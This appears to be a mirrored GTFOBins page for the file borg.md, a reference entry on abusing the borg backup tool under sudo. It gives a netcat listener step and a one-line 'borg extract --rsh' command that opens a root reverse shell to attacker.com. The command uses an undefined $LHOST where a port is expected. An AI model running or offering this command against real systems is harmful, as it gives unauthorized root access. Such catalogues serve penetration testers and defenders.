This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2024-12-27 07:18:48 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
b2d28b6a18
GTFOBins.github.io
/
_gtfobins
/
borg.md
JM Sanchez
b2d28b6a18
Create borg.md
2024-08-18 23:45:53 +08:00
259 B
Raw
Blame
History
sudo
description
code
Run `nc -l -p 12345` on the attacker box to receive the shell.
RHOST=attacker.com RPORT=12345 NETCAT=/usr/bin/nc sudo borg extract .@.:/::. --rsh "$NETCAT $RHOST $LHOST -e sh"